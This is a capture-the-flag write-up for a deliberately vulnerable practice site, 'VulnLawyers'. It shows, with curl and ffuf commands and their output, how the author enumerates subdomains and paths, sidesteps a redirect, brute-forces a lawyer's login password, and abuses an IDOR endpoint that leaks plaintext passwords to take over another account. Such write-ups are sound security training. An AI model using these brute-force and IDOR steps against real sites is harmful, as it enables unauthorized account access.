[[toc]]
A Little Disclaimer
So you’re looking for answers, are ya? Well, I’ve got them, but for a price… Namely a little bit of your time and attention:
Please try the challenges yourself before checking the answers.
CTF’s are notoriously ‘NP’ prone. Once you’ve seen the answer, it’s easy to think you could’ve come up with that. There is nothing wrong with looking up answers, but try reflect on why you couldn’t figure it out. I try to explain my thought process as best and brief as possible, but figuring it out yourself is just the best feeling, so please give it another go when you’re reading this! I’ll not include any of the flags to avoid people simply copying and pasting them.
Another note, I create these writeups as if speaking to myself. If my manner of speaking seems a bit odd, you try talking to yourself without sounding a little odd.
Flags
Data Baby (Enumeration)
The first flag can be found by performing a standard recon of the
subdomains of vulnlawyers.co.uk
.
$ dnsrecon -d vulnlawyers.co.uk -D ~/path/to/wordlists/subdomains.txt -t brt
[*] Using the dictionary file: /home/zohar/Documents/Playground/wordlists/subdomains.txt (provided by user)
[*] brt: Performing host and subdomain brute force against vulnlawyers.co.uk...
[+] A data.vulnlawyers.co.uk 68.183.255.206
[+] A www.vulnlawyers.co.uk 68.183.255.206
[+] 2 Records Found
Doing a http request with curl
, or opening the domain in your browser
returns some info about the API and the first flag.
$ curl http://data.vulnlawyers.co.uk -H "Cookie: <your_ctf_cookie>"
{"name":"VulnLawyers Website API","version":"2.1.04","flag":"[^FLAG^1337-DIY-1337^FLAG^]"}
Browsers are Evil (Enumeration)
Now that we know the different domains that are available to us, let’s do some recon on the different files and folders we have access to.
$ ffuf -w ~/Documents/Playground/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=<your_ctf_cookie>" -u http://www.vulnlawyers.co.uk/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
[...]
________________________________________________
css [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 15ms]
denied [Status: 401, Size: 1020, Words: 178, Lines: 30, Duration: 15ms]
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 15ms]
js [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 14ms]
login [Status: 302, Size: 1119, Words: 197, Lines: 31, Duration: 16ms]
Since we are (always) looking to escalate privileges, the login
endpoint looks especially interesting. Entering
http://www.vulnlawyers.co.uk/login
in your browser will lead to a page
that says Acess is denied from your IP address. Shit. But take a
look at where we are http://www.vulnlawyers.co.uk/denied
, we’ve been
rerouted.
Let’s take a look at what happens with our request in the browser by
opening the developer tab (often F12, but if you didn’t know
that, you might want to look into some other challenges). Opening the
‘Network’ tab (on Firefox, might be different on Chrome, Safari, etc.)
shows that we got a 302
code from the /login
endpoint. This code
specifically tells a browser to reroute to a URL given by the
Location
header 1.
Browsers can do weird stuff, so let’s try to ask curl
what’s up.
$ curl www.vulnlawyers.co.uk/login -H "Cookie: ctfchallenge=<your_ctf_cookie>"
[...]
<div class="alert alert-info">
<p>Access to this portal can now be found here <a href=/lawyers-only">/lawyers-only</a></p>
<p>[^FLAG^TRY_ME_B*TCH^FLAG^]</p>
</div>
[...]
Well, would you look at that, a flag and a hidden endpoint :eyes:! Christmas came early this year.
Opening the URL http://www.vulnlawyers.co.uk/lawyers-only
will bring
us to a login screen. Now we can start gaining some unrequisited
privileges.
Pipelining (Enumeration)
The current goal is to log in, but we lack any user data. Thinking back,
the data.vulnlawyers.co.uk
probably contains some of that precious
user data. Actually, we have yet to enumerate files and folders. Not you
tho, no, while we were trying to figure out how to access the login
page, you have of course started ffuf
’ing (that’s not a word, but it
should be) the domain. If you haven’t, keep in mind that reconnaissance
can sometimes take a long time. Minimize waiting and keep that noggin of
yours churning.
$ ffuf -w ~/Documents/Playground/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=<your_ctf_cookie>" -u http://data.vulnlawyers.co.uk/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
[...]
________________________________________________
users [Status: 200, Size: 406, Words: 6, Lines: 1, Duration: 21ms]
’Lo and behold, an endpoint called /users
. Let’s employ curl
and see
what it holds.
curl data.vulnlawyers.co.uk/users -H "Cooki e: ctfchallenge=<your_ctf_cookie>"
{
"users": [
{
"name": "Yusef Mcclain",
"email": "yusef.mcclain@vulnlawyers.co.uk"
},
{
"name": "Shayne Cairns",
"email": "shayne.cairns@vulnlawyers.co.uk"
},
{
"name": "Eisa Evans",
"email": "eisa.evans@vulnlawyers.co.uk"
},
{
"name": "Jaskaran Lowe",
"email": "jaskaran.lowe@vulnlawyers.co.uk"
},
{
"name": "Marsha Blankenship",
"email": "marsha.blankenship@vulnlawyers.co.uk"
}
],
"flag": "[^FLAG^https://media.giphy.com/media/26gs6vEzlpaxuYgso/giphy.gif^FLAG^]"
}
And that’s our third flag. Onto exploitation!
Higher and Higher (Exploitation)
With a bit of luck, the attorneys are not technically inclined and use simple passwords. After a bit of trail-and-error, we stumble upon Jaskaran Lowe.
ffuf -w ~/Documents/Playground/wordlists/passwords.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=<your_ctf_cookie>" -u http://www.vulnlawyers.co.uk/lawyers-only-login -H "Content-Type: applicati
on/x-www-form-urlencoded" -d 'email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ' -fr "Invalid"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
[...]
________________________________________________
summer [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
Logging in using browser gives us some info regarding a case, but more importantly, the next flag!
Some More Digging (Exploitation)
We got a whole new section of the site to explore! Now, it might be
worth doing some more fuzzing on the path since we’ve actually been
redirected to .../lawyers-only-login
from .../lawyers-only
, and
opening the Profile tab shows the path .../lawyers-only-profile
.
Thus, we run ffuf [...] http://www.vulnlawyers.co.uk/lawyers-only-FUZZ
while further exploring the new domain. Spoiler alert: no interesting
results, but good habit nonetheless.
Looking at the Portal page shows a list of current cases. There is a single case which is managed by Shayne Cairns, who is also the only one who can perform actions on it. New goal: gain access to their account. Opening the source code of the shows nothing interesting.
Taking a closer look at the Profile page shows us a place where we can update our user data! Immediate thought: could we somehow use this to update another user’s profile info? Let’s take a look at the request payload using the Network tab in the dev tools.
name=Jaskaran+Lowe&email=jaskaran.lowe%40vulnlawyers.co.uk
Hmm, doesn’t seem like it. This leads to finding more info in the
request, like a new cookie called token
. Makes sense, these requests
have to be authenticated, we should include this in any requests we do
via the terminal. Otherwise, nothing seems unusual.
Perhaps we can find something interesting in the source code. Let’s use
curl
to retrieve the data.
$ curl curl http://www.vulnlawyers.co.uk/lawyers-only-profile -H "Cookie: ctfchallenge=<your_ctf_cookie>; token=<your_lawyer_cookie>"
<script>
$.getJSON('/lawyers-only-profile-details/4',function(resp){
$('input[name="email"]').val( resp.email );
$('input[name="name"]').val( resp.name );
});
</script>
Oh would you look at that :sunglasses:! That’s how our info was already
filled in! For some reason they use some other source than the
data.vulnlawyers.co.uk/users
endpoint which we’ve seen before. Maybe
this contains different information.
$ curl http://www.vulnlawyers.co.uk/lawyers-only-profile-details/4 -H "Cookie: ctfchallenge=<your_ctf_cookie>; token=<your_lawyer_cookie>"
{
"id": 4,
"name": "Jaskaran Lowe",
"email": "jaskaran.lowe@vulnlawyers.co.uk",
"password": "summer"
}
Oh yes. Plain old passwords. Of course, they should have used the
data.vulnlawyers.co.uk/users
API endpoint to retrieve that data. Let’s
access Shayne Cairns profile details with the user id
which we can
find at data.vulnlawyers.co.uk/users
. Small note: that id was
zero-indexed (Jaskaran’s id
here is 4
while it was 3
before), this
one isn’t. Compensating for that gives the following request.
$ curl http://www.vulnlawyers.co.uk/lawyers-only-profile-details/2 -H "Cookie: ctfchallenge=<your_ctf_cookie>; token=<your_lawyer_cookie>"
{
"id": 2,
"name": "Shayne Cairns",
"email": "shayne.cairns@vulnlawyers.co.uk",
"password": "wa1^3p",
"flag": "[^FLAG^NA_AH^FLAG^]"
}
Flag number five!
Finishing Up (Exploitation)
This leaves us to the last flag. We now use the found credentials to log in as Shayne Cairns, delete the case, and find the last flag :trophy:.
Found](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/302)